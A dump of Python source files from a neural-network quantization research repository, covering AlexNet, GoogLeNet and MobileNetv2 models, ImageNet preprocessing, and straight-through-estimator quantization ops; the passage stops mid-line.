== None or weightInqLevels == None)\n if weightInqBits != None:\n print('warning: weightInqBits deprecated')\n if weightInqBits == 1:\n weightInqLevels = 2\n elif weightInqBits >= 2:\n weightInqLevels = 2**weightInqBits\n else:\n assert(False)\n \n def activ(name, nc):\n if quantAct:\n if quantActSTENumLevels != None and quantActSTENumLevels > 0: \n return STEActivation(startEpoch=0, \n numLevels=quantActSTENumLevels)\n else:\n return StochasticActivation(*quant_schemes[name], nc)\n else: \n assert(quantActSTENumLevels == None or quantActSTENumLevels <= 0)\n return nn.ReLU(inplace=True)\n \n def conv2d(name, ni, no, kernel_size=3, stride=1, padding=1, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticConv2d(*quant_schemes[name], ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n else:\n return INQConv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Conv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n \n def linear(name, ni, no, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticLinear(*quant_schemes[name], ni, no, bias=bias)\n else:\n return INQLinear(ni, no, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Linear(ni, no, bias=bias)\n \n def dropout(p=0.5):\n if withDropout:\n return nn.Dropout(p)\n else:\n return nn.Identity()\n \n if alternateSizes:\n #following LQ-net\n c0 = 3\n c1 = int(96 * capacity)\n c2 = int(256 * capacity)\n c3 = int(384 * capacity)\n c4 = int(384 * capacity)\n c5 = 256\n nh = 4096\n else: \n c0 = 3\n c1 = int(64 * capacity)\n c2 = int(192 * capacity)\n c3 = int(384 * capacity)\n c4 = int(256 
* capacity)\n c5 = 256\n nh = 4096\n \n \n # convolutional layers\n if quantSkipFirstLayer:\n self.phi1_conv = nn.Conv2d(c0, c1, kernel_size=11, \n stride=4, padding=2, bias=False)\n else:\n self.phi1_conv = conv2d('phi1_conv', c0, c1, kernel_size=11, \n stride=4, padding=2, bias=False)\n self.phi1_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi1_bn = nn.BatchNorm2d(c1)\n self.phi1_act = activ('phi1_act', c1)\n self.phi2_conv = conv2d('phi2_conv', c1, c2, kernel_size=5, padding=2, bias=False)\n self.phi2_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi2_bn = nn.BatchNorm2d(c2)\n self.phi2_act = activ('phi2_act', c2)\n self.phi3_conv = conv2d('phi3_conv', c2, c3, kernel_size=3, padding=1, bias=False)\n self.phi3_bn = nn.BatchNorm2d(c3)\n self.phi3_act = activ('phi3_act', c3)\n self.phi4_conv = conv2d('phi4_conv', c3, c4, kernel_size=3, padding=1, bias=False)\n self.phi4_bn = nn.BatchNorm2d(c4)\n self.phi4_act = activ('phi4_act', c4)\n self.phi5_conv = conv2d('phi5_conv', c4, c5, kernel_size=3, padding=1, bias=False)\n self.phi5_mp = nn.MaxPool2d(kernel_size=3, stride=2)\n self.phi5_bn = nn.BatchNorm2d(c5)\n self.phi5_act = activ('phi5_act', c5)\n # fully connected layers\n self.phi6_do = dropout()\n self.phi6_fc = linear('phi6_fc', c5*6*6, nh, bias=False)\n self.phi6_bn = nn.BatchNorm1d(nh)\n self.phi6_act = activ('phi6_act', nh)\n self.phi7_do = dropout()\n self.phi7_fc = linear('phi7_fc', nh, nh, bias=False)\n self.phi7_bn = nn.BatchNorm1d(nh)\n self.phi7_act = activ('phi7_act', nh)\n \n if quantSkipLastLayer:\n self.phi8_fc = nn.Linear(nh, 1000, bias=False)\n else:\n self.phi8_fc = linear('phi8_fc', nh, 1000, bias=False)\n self.phi8_bn = nn.BatchNorm1d(1000)\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True)\n\n def forward(self, x, withStats=False):\n x = self.phi1_conv(x)\n x = self.phi1_mp(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_conv(x)\n x = self.phi2_mp(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_conv(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_conv(x)\n x = self.phi4_bn(x)\n x = self.phi4_act(x)\n x = self.phi5_conv(x)\n x = self.phi5_mp(x)\n x = self.phi5_bn(x)\n x = self.phi5_act(x)\n x = x.view(-1, torch.Tensor(list(x.size()[-3:])).to(torch.int32).prod().item())\n x = self.phi6_do(x)\n x = self.phi6_fc(x)\n x = self.phi6_bn(x)\n x = self.phi6_act(x)\n x = self.phi7_do(x)\n x = self.phi7_fc(x)\n x = self.phi7_bn(x)\n x = self.phi7_act(x)\n x = self.phi8_fc(x)\n x = self.phi8_bn(x)\n if withStats:\n stats = []\n stats.append(('phi1_conv_w', self.phi1_conv.weight.data))\n stats.append(('phi2_conv_w', self.phi2_conv.weight.data))\n stats.append(('phi3_conv_w', self.phi3_conv.weight.data))\n stats.append(('phi4_conv_w', self.phi4_conv.weight.data))\n stats.append(('phi5_conv_w', self.phi5_conv.weight.data))\n stats.append(('phi6_fc_w', self.phi6_fc.weight.data))\n stats.append(('phi7_fc_w', self.phi7_fc.weight.data))\n stats.append(('phi8_fc_w', self.phi8_fc.weight.data))\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n\n\n\n\nif __name__ == '__main__':\n model = AlexNet(quantAct=False, quantWeights=True, \n weightInqSchedule={}, weightInqBits=2, \n weightInqStrategy=\"magnitude-SRQ\", \n quantSkipFirstLayer=True)\n \n import torchvision as tv\n modelRef = tv.models.alexnet(pretrained=True)\n stateDictRef = 
modelRef.state_dict()\n #batch normalization not in original model...?!\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n" }, { "alpha_fraction": 0.8294573426246643, "alphanum_fraction": 0.8294573426246643, "avg_line_length": 31.25, "blob_id": "ec890295d521e7472571f60796a79e86256b48ea", "content_id": "9379a5b11bca46209a13e7b31ac274faf8d239c7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "permissive", "max_line_length": 55, "num_lines": 4, "path": "/quantlab/ImageNet/GoogLeNet/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .googlenet import GoogLeNet\n" }, { "alpha_fraction": 0.4886666536331177, "alphanum_fraction": 0.5300833582878113, "avg_line_length": 41.25352096557617, "blob_id": "75964c3e2bc0ef11073289b4cce3757e56ab05c6", "content_id": "0e769de6c616f1e9b765ceb3d490dd48d35d89cc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12000, "license_type": "permissive", "max_line_length": 99, "num_lines": 284, "path": "/quantlab/ImageNet/GoogLeNet/googlenet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n# large parts of the code taken or adapted from torchvision\n\nimport warnings\nfrom collections import namedtuple\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n#from quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\n#from quantlab.indiv.ste_ops import STEActivation\n\n\nmodel_urls = {\n # GoogLeNet ported from TensorFlow\n 'googlenet': 'https://download.pytorch.org/models/googlenet-1378be20.pth',\n}\n\nclass BasicConv2d(nn.Module):\n\n def __init__(self, in_channels, out_channels, quantized=True, **kwargs):\n super(BasicConv2d, self).__init__()\n if quantized:\n self.conv = INQConv2d(in_channels, out_channels, bias=False, **kwargs)\n else:\n self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\nclass Inception(nn.Module):\n\n def __init__(self, in_channels, ch1x1, ch3x3red, ch3x3, ch5x5red, ch5x5, pool_proj,\n numLevels=3, strategy=\"magnitude\", quantInitMethod=None):\n super(Inception, self).__init__()\n\n self.branch1 = BasicConv2d(in_channels, ch1x1, kernel_size=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod)\n\n self.branch2 = nn.Sequential(\n BasicConv2d(in_channels, ch3x3red, kernel_size=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod),\n BasicConv2d(ch3x3red, ch3x3, kernel_size=3, padding=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod)\n )\n\n self.branch3 = nn.Sequential(\n BasicConv2d(in_channels, ch5x5red, kernel_size=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod),\n BasicConv2d(ch5x5red, ch5x5, kernel_size=3, padding=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod)\n )\n\n self.branch4 = nn.Sequential(\n nn.MaxPool2d(kernel_size=3, stride=1, padding=1, ceil_mode=True),\n BasicConv2d(in_channels, pool_proj, 
kernel_size=1, \n numLevels=numLevels, strategy=strategy, \n quantInitMethod=quantInitMethod)\n )\n\n def forward(self, x):\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n branch3 = self.branch3(x)\n branch4 = self.branch4(x)\n\n outputs = [branch1, branch2, branch3, branch4]\n return torch.cat(outputs, 1)\n\n\nclass GoogLeNet(nn.Module):\n\n def __init__(self, num_classes=1000, quant_schemes=None, \n quantWeights=True, quantAct=True,\n weightInqSchedule=None, weightInqLevels=None,\n weightInqStrategy=\"magnitude\", weightInqQuantInit=None,\n quantSkipFirstLayer=False, quantSkipLastLayer=False, pretrained=False):\n super().__init__()\n assert(quantAct == False)\n assert(quantSkipFirstLayer)\n assert(quantSkipLastLayer)\n\n self.conv1 = BasicConv2d(3, 64, quantized=False, \n kernel_size=7, stride=2, padding=3)\n \n self.maxpool1 = nn.MaxPool2d(3, stride=2, ceil_mode=True)\n self.conv2 = BasicConv2d(64, 64, kernel_size=1,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.conv3 = BasicConv2d(64, 192, kernel_size=3, padding=1,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.maxpool2 = nn.MaxPool2d(3, stride=2, ceil_mode=True)\n\n self.inception3a = Inception(192, 64, 96, 128, 16, 32, 32,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception3b = Inception(256, 128, 128, 192, 32, 96, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.maxpool3 = nn.MaxPool2d(3, stride=2, ceil_mode=True)\n\n self.inception4a = Inception(480, 192, 96, 208, 16, 48, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception4b = Inception(512, 160, 112, 224, 24, 64, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception4c = Inception(512, 128, 128, 256, 24, 64, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception4d = Inception(512, 112, 144, 288, 32, 64, 64,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception4e = Inception(528, 256, 160, 320, 32, 128, 128,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.maxpool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True)\n\n self.inception5a = Inception(832, 256, 160, 320, 32, 128, 128,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n self.inception5b = Inception(832, 384, 192, 384, 48, 128, 128,\n numLevels=weightInqLevels, \n strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.dropout = nn.Dropout(0.2)\n self.fc = nn.Linear(1024, num_classes)\n\n self._initialize_weights()\n \n \n if pretrained:\n from torch.hub import load_state_dict_from_url\n state_dict = load_state_dict_from_url(model_urls['googlenet'])\n missing_keys, unexpected_keys = self.load_state_dict(state_dict, strict=False)\n \n #filter out expected mismatches \n #(missing auxiliary outputs in model, missing INQ params in pretrained data)\n missing_keys_nonInq = [s for s in missing_keys \n if not (s.endswith('.sParam') or \n s.endswith('.weightFrozen'))]\n unexpected_keys_nonAux = [s for s in unexpected_keys \n if not s.startswith('aux')]\n\n 
assert(len(unexpected_keys_nonAux) == 0)\n assert(len(missing_keys_nonInq) == 0)\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True)\n\n def _initialize_weights(self):\n for m in self.modules():\n if (isinstance(m, nn.Conv2d) or \n isinstance(m, INQConv2d) or \n isinstance(m, nn.Linear)):\n \n import scipy.stats as stats\n X = stats.truncnorm(-2, 2, scale=0.01)\n values = torch.as_tensor(X.rvs(m.weight.numel()), dtype=m.weight.dtype)\n values = values.view(m.weight.size())\n with torch.no_grad():\n m.weight.copy_(values)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def forward(self, x, withStats=False):\n # N x 3 x 224 x 224\n x = self.conv1(x)\n # N x 64 x 112 x 112\n x = self.maxpool1(x)\n # N x 64 x 56 x 56\n x = self.conv2(x)\n # N x 64 x 56 x 56\n x = self.conv3(x)\n # N x 192 x 56 x 56\n x = self.maxpool2(x)\n # N x 192 x 28 x 28\n x = self.inception3a(x)\n # N x 256 x 28 x 28\n x = self.inception3b(x)\n # N x 480 x 28 x 28\n x = self.maxpool3(x)\n # N x 480 x 14 x 14\n x = self.inception4a(x)\n # N x 512 x 14 x 14\n x = self.inception4b(x)\n # N x 512 x 14 x 14\n x = self.inception4c(x)\n # N x 512 x 14 x 14\n x = self.inception4d(x)\n # N x 528 x 14 x 14\n x = self.inception4e(x)\n # N x 832 x 14 x 14\n x = self.maxpool4(x)\n # N x 832 x 7 x 7\n x = self.inception5a(x)\n # N x 832 x 7 x 7\n x = self.inception5b(x)\n # N x 1024 x 7 x 7\n x = self.avgpool(x)\n # N x 1024 x 1 x 1\n x = torch.flatten(x, 1)\n # N x 1024\n x = self.dropout(x)\n x = self.fc(x)\n # N x 1000 (num_classes)\n \n if withStats:\n stats = []\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n\n\nif __name__ == \"__main__\":\n model = GoogLeNet(quantAct=False, weightInqSchedule={}, \n quantSkipFirstLayer=True, quantSkipLastLayer=True, \n pretrained=True)\n \n loadModel = False\n if loadModel:\n # path = '../../../ImageNet/logs/exp038/saves/best-backup.ckpt' # BWN\n# path = '../../../ImageNet/logs/exp043/saves/best.ckpt' # TWN\n path = '../../../ImageNet/logs/exp054/saves/best.ckpt' # BWN\n fullState = torch.load(path, map_location='cpu')\n netState = fullState['indiv']['net']\n model.load_state_dict(netState)\n \n import matplotlib.pyplot as plt\n layerNames = list(netState.keys())\n selectedLayers = ['layer4.0.conv1', \n 'layer2.1.conv2', \n 'layer1.0.conv2']\n # selectedLayers = [l + '.weight' for l in selectedLayers]\n selectedLayers = [l + '.weightFrozen' for l in selectedLayers]\n _, axarr = plt.subplots(len(selectedLayers))\n for ax, layerName in zip(axarr, selectedLayers):\n plt.sca(ax)\n plt.hist(netState[layerName].flatten(), \n bins=201, range=(-3,3))\n plt.xlim(-3,3)\n plt.title(layerName)\n \n exportONNX = False\n if exportONNX:\n modelFullPrec = GoogLeNet(quantAct=False, quantWeights=False, \n weightInqSchedule={}, \n quantSkipFirstLayer=True, \n quantSkipLastLayer=True, \n pretrained=True)\n dummyInput = torch.randn(1, 3, 224, 224)\n pbuf = torch.onnx.export(modelFullPrec, dummyInput, \n \"export.onnx\", verbose=True, \n input_names=['input'], \n output_names=['output'])\n" }, { "alpha_fraction": 0.6254681944847107, "alphanum_fraction": 0.6441947817802429, "avg_line_length": 23.272727966308594, "blob_id": "15311cafea1e1d8d940040a632ecaab0411bfe6b", "content_id": "a214bc96fb33f70680cfe5fbe287979f6852d430", "detected_licenses": [ "Apache-2.0" ], 
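A small usage sketch for the two post-processing helpers in the MeyerNet postprocess record above; the helpers are redefined inline so the snippet stands alone, and the tensors are made-up stand-ins for network outputs and dataset labels rather than anything from the repository:

import torch

def postprocess_pr(pr_outs):
    _, pr_outs = torch.max(pr_outs, dim=1)           # argmax over the class dimension
    return [p.item() for p in pr_outs.detach().cpu()]

def postprocess_gt(gt_labels):
    return [l.item() for l in gt_labels.detach().cpu()]

logits = torch.tensor([[0.1, 2.0, -1.0],             # two samples, three classes (dummy values)
                       [3.0, 0.0, 0.5]])
labels = torch.tensor([1, 0])
assert postprocess_pr(logits) == [1, 0]
assert postprocess_gt(labels) == [1, 0]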
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 267, "license_type": "permissive", "max_line_length": 55, "num_lines": 11, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/postprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport torch\n\ndef postprocess_pr(pr_outs):\n _, pr_outs = torch.max(pr_outs, dim=1)\n return [p.item() for p in pr_outs.detach().cpu()]\n\n\ndef postprocess_gt(gt_labels):\n return [l.item() for l in gt_labels.detach().cpu()]\n" }, { "alpha_fraction": 0.519625186920166, "alphanum_fraction": 0.5514497756958008, "avg_line_length": 33.69938659667969, "blob_id": "119a40030ae5b4e017a6ab88311882b68db32388", "content_id": "72718fec80dd45366e35b4dacbfb51f7ebb028e6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5656, "license_type": "permissive", "max_line_length": 136, "num_lines": 163, "path": "/quantlab/ImageNet/MobileNetv2/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport os\nimport torch\nimport torchvision\nfrom torchvision.transforms import RandomResizedCrop, RandomHorizontalFlip, Resize, RandomCrop, CenterCrop, ToTensor, Normalize, Compose\n\n\n_ImageNet = {\n 'Normalize': {\n 'mean': (0.485, 0.456, 0.406),\n 'std': (0.229, 0.224, 0.225)\n },\n 'PCA': {\n 'eigvals': torch.Tensor([0.2175, 0.0188, 0.0045]),\n 'eigvecs': torch.Tensor([[-0.5675, 0.7192, 0.4009],\n [-0.5808, -0.0045, -0.8140],\n [-0.5836, -0.6948, 0.4203]])\n }\n}\n\n\nclass Grayscale(object):\n\n def __init__(self):\n self._Rec601 = {\n 'red': 0.299,\n 'green': 0.587,\n 'blue': 0.114\n }\n\n def __call__(self, img):\n # uses the Recommendation 601 (Rec. 
601) RGB-to-YCbCr conversion\n gs = img.clone()\n gs[0].mul_(self._Rec601['red']).add_(self._Rec601['green'], gs[1]).add_(self._Rec601['blue'], gs[2])\n gs[1].copy_(gs[0])\n gs[2].copy_(gs[0])\n return gs\n\n\nclass Brightness(object):\n\n def __init__(self, alphamax):\n self.alphamax = alphamax\n\n def __call__(self, img):\n # when alpha = 0., the image does not change\n # when alpha = alphamax (<= 1.), the image goes black\n gs = torch.zeros_like(img)\n alpha = self.alphamax * torch.rand(1).item()\n return torch.lerp(img, gs, alpha)\n\n\nclass Contrast(object):\n\n def __init__(self, alphamax):\n self.alphamax = alphamax\n self.grayscale = Grayscale()\n\n def __call__(self, img):\n # when alpha = 0., the image does not change\n # when alpha = alphamax (<= 1.), the image is replaced by the average of pixels of its grayscale version\n gs = self.grayscale(img)\n gs.fill_(gs.mean())\n alpha = self.alphamax * torch.rand(1).item()\n return torch.lerp(img, gs, alpha)\n\n\nclass Saturation(object):\n\n def __init__(self, alphamax):\n self.alphamax = alphamax\n self.grayscale = Grayscale()\n\n def __call__(self, img):\n # when alpha = 0., the image does not change\n # when alpha = alphamax (<= 1.), the image is replaced by its grayscale version\n gs = self.grayscale(img)\n alpha = self.alphamax * torch.rand(1).item()\n return torch.lerp(img, gs, alpha)\n\n\nclass ColorJitter(object):\n\n def __init__(self, brightness_amax=0.4, contrast_amax=0.4, saturation_amax=0.4):\n self.transforms = []\n if brightness_amax != 0.:\n self.transforms.append(Brightness(alphamax=brightness_amax))\n if contrast_amax != 0.:\n self.transforms.append(Contrast(alphamax=contrast_amax))\n if saturation_amax != 0.:\n self.transforms.append(Saturation(alphamax=saturation_amax))\n\n def __call__(self, img):\n if self.transforms is not None:\n order = torch.randperm(len(self.transforms))\n for i in order:\n img = self.transforms[i](img)\n return img\n\n\nclass Lighting(object):\n \"\"\"AlexNet-style, PCA-based lighting noise.\"\"\"\n\n def __init__(self, pcaparams, alphastd=0.1):\n self.eigvals = pcaparams['eigvals']\n self.eigvecs = pcaparams['eigvecs']\n self.alphastd = alphastd\n\n def __call__(self, img):\n # let V be the matrix which columns V^{(j)} are the Principal Components\n # to each RGB pixel is added a random combination \\sum_{j} V^{(j)} (\\alpha_{j} * \\Lambda_{j}),\n # with \\alpha_{j} a normally distributed random scaling factor of the j-th component\n if self.alphastd != 0.:\n alpha = img.new_tensor(0).resize_(3).normal_(0, self.alphastd)\n noise = torch.mul(alpha.view(1, 3), self.eigvals.view(1, 3))\n noise = torch.mul(self.eigvecs.type_as(img).clone(), noise).sum(1)\n img = torch.add(img, noise.view(3, 1, 1).expand_as(img))\n return img\n\n\ndef get_transforms(augment):\n valid_t = Compose([Resize(256),\n CenterCrop(224),\n ToTensor(),\n Normalize(**_ImageNet['Normalize'])])\n if augment == False:\n train_t = valid_t\n elif augment == True:\n train_t = Compose([RandomResizedCrop(224),\n RandomHorizontalFlip(),\n ToTensor(),\n ColorJitter(),\n Lighting(_ImageNet['PCA']),\n Normalize(**_ImageNet['Normalize'])])\n elif augment == \"torchvision\": \n train_t = Compose([RandomResizedCrop(224),\n RandomHorizontalFlip(),\n ToTensor(),\n Normalize(**_ImageNet['Normalize'])])\n elif augment == \"torchvision2\": \n train_t = Compose([Resize(256),\n RandomCrop(224),\n RandomHorizontalFlip(),\n ToTensor(),\n Normalize(**_ImageNet['Normalize'])])\n else:\n assert(False)\n \n transforms = {\n 'training': train_t,\n 
'validation': valid_t\n }\n return transforms\n\n\ndef load_data_sets(dir_data, data_config):\n transforms = get_transforms(data_config['augment'])\n train_set = torchvision.datasets.ImageFolder(os.path.join(dir_data, 'train'), transforms['training'])\n valid_set = torchvision.datasets.ImageFolder(os.path.join(os.path.realpath(dir_data), 'val'), transforms['validation'])\n test_set = valid_set\n return train_set, valid_set, test_set\n" }, { "alpha_fraction": 0.855513334274292, "alphanum_fraction": 0.8783270120620728, "avg_line_length": 42.83333206176758, "blob_id": "29f809296efc04ebbed14ea4ebbba94fc56eaaca", "content_id": "519b84b34725046743f65d582c8c7392bfedeb41", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "permissive", "max_line_length": 58, "num_lines": 6, "path": "/quantlab/ImageNet/MobileNetv2/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .mobilenetv2baseline import MobileNetv2Baseline\nfrom .mobilenetv2residuals import MobileNetv2Residuals\nfrom .mobilenetv2quantWeight import MobileNetv2QuantWeight\n" }, { "alpha_fraction": 0.6348921060562134, "alphanum_fraction": 0.6378896832466125, "avg_line_length": 37.79069900512695, "blob_id": "6178231ec171c3d2e91a26c5ba45f0aac92d96a8", "content_id": "26c65275144b48fd7e84f90eb12d27448f5dcbd1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1668, "license_type": "permissive", "max_line_length": 122, "num_lines": 43, "path": "/quantlab/indiv/daemon.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport torch\nimport torch.nn as nn\n\nfrom .transfer import load_pretrained\n\n\ndef get_topo(logbook):\n \"\"\"Return a network for the experiment and the loss function for training.\"\"\"\n \n # create the network\n net_config = logbook.config['indiv']['net']\n if net_config['class'] not in logbook.module.__dict__:\n raise ValueError('Network topology {} is not defined for problem {}'.format(net_config['class'], logbook.problem))\n net = getattr(logbook.module, net_config['class'])(**net_config['params'])\n \n # load checkpoint state or pretrained network\n if logbook.ckpt:\n net.load_state_dict(logbook.ckpt['indiv']['net'])\n elif net_config['pretrained']:\n load_pretrained(logbook, net)\n \n # move to proper device and, if possible, parallelize\n device = torch.cuda.current_device() if torch.cuda.is_available() else torch.device('cpu')\n net = net.to(device)\n if torch.cuda.device_count() > 1:\n net_maybe_par = nn.DataParallel(net)\n else:\n net_maybe_par = net\n \n # create the loss function\n loss_fn_config = logbook.config['indiv']['loss_function']\n loss_fn_dict = {**nn.__dict__, **logbook.module.__dict__}\n if loss_fn_config['class'] not in loss_fn_dict:\n raise ValueError('Loss function {} is not defined.'.format(loss_fn_config['class']))\n loss_fn = loss_fn_dict[loss_fn_config['class']]\n if 'net' in loss_fn.__init__.__code__.co_varnames:\n loss_fn = loss_fn(net, **loss_fn_config['params'])\n else:\n loss_fn = loss_fn(**loss_fn_config['params'])\n \n return net, net_maybe_par, device, loss_fn\n" }, { "alpha_fraction": 0.5680412650108337, "alphanum_fraction": 0.5816494822502136, "avg_line_length": 34.7185173034668, "blob_id": 
"48f0201a1bc7f5fdf4bb93ea7dad5c6cac8dc467", "content_id": "00e170d203459ec2981532db5da2e88dd7707503", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4850, "license_type": "permissive", "max_line_length": 116, "num_lines": 135, "path": "/quantlab/indiv/ste_ops.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport quantlab.indiv as indiv\n\nclass ClampWithGradInwards(torch.autograd.Function):\n \"\"\"Clamps the input, passes the grads for inputs inside or at the\n \"\"\"\n @staticmethod\n def forward(ctx, x, low, high):\n ctx.save_for_backward(x, low, high)\n return x.clamp(low.item(), high.item())\n\n @staticmethod\n def backward(ctx, grad_incoming):\n x, low, high = ctx.saved_tensors\n \n grad_outgoing = grad_incoming.clone()\n grad_outgoing[(x > high)] = 0\n grad_outgoing[(x < low)] = 0\n grad_outgoing[(x == high)*(grad_incoming < 0)] = 0\n grad_outgoing[(x == low )*(grad_incoming > 0)] = 0\n return grad_outgoing, None, None\n\n\ndef clampWithGrad(x, low, high):\n return x - (x - x.clamp(low,high)).detach()\n\ndef clampWithGradInwards(x, low, high):\n return ClampWithGradInwards().apply(x, x.new([low]), x.new([high]))\n\ndef STERoundFunctional(x):\n return x - (x - x.round()).detach()\n\ndef STEFloorFunctional(x):\n neg = (x < 0).to(dtype=torch.float)\n floored = x.floor() + neg\n return x - (x - floored).detach()\n\nclass STEController(indiv.Controller):\n def __init__(self, modules, clearOptimStateOnStart=False):\n super().__init__()\n self.modules = modules\n self.clearOptimStateOnStart = clearOptimStateOnStart\n \n def step(self, epoch, optimizer=None, tensorboardWriter=None):\n #step each STE module\n for m in self.modules: \n m.step(epoch, self.clearOptimStateOnStart, optimizer)\n \n @staticmethod\n def getSteModules(net):\n return [m for m in net.modules() if isinstance(m, STEActivation)]\n\nclass STEActivation(torch.nn.Module):\n \"\"\"quantizes activations according to the straight-through estiamtor (STE). 
\n Needs a STEController, if startEpoch > 0\n\n monitorEpoch: In this epoch, keep track of the maximal activation value (absolute value).\n Then (at epoch >= startEpoch), clamp the values to [-max, max], and then do quantization.\n If monitorEpoch is None, max=1 is used.\"\"\"\n def __init__(self, startEpoch=0, numLevels=3, passGradsWhenClamped=False, monitorEpoch=None, floorToZero=False):\n super().__init__()\n self.startEpoch = startEpoch\n self.started = startEpoch <= 0\n\n self.monitorEpoch = monitorEpoch\n self.monitoring = False\n if monitorEpoch is not None:\n self.monitoring = monitorEpoch == 1 # because the epoch starts at epoch 1\n assert(startEpoch > monitorEpoch)\n\n self.floorToZero = floorToZero\n\n assert(numLevels >= 2)\n self.numLevels = numLevels\n self.passGradsWhenClamped = passGradsWhenClamped\n self.absMaxValue = torch.nn.Parameter(torch.ones(1),\n requires_grad=False)\n\n def forward(self, x):\n if self.monitoring:\n self.absMaxValue.data[0] = max(x.abs().max(), self.absMaxValue.item())\n \n if self.started:\n# factor = 1/self.absMaxValue.item() * (self.numLevels // 2)\n# xclamp = clampWithGrad(x, -1, 1)\n x = x / self.absMaxValue.item() # map from [-max, max] to [-1, 1]\n if self.passGradsWhenClamped:\n# xclamp = clampWithGrad(x, -1, 1)\n xclamp = clampWithGradInwards(x, -1, 1)\n else:\n xclamp = x.clamp(-1, 1)\n \n y = xclamp\n if self.floorToZero:\n y = STEFloorFunctional(y*((self.numLevels - 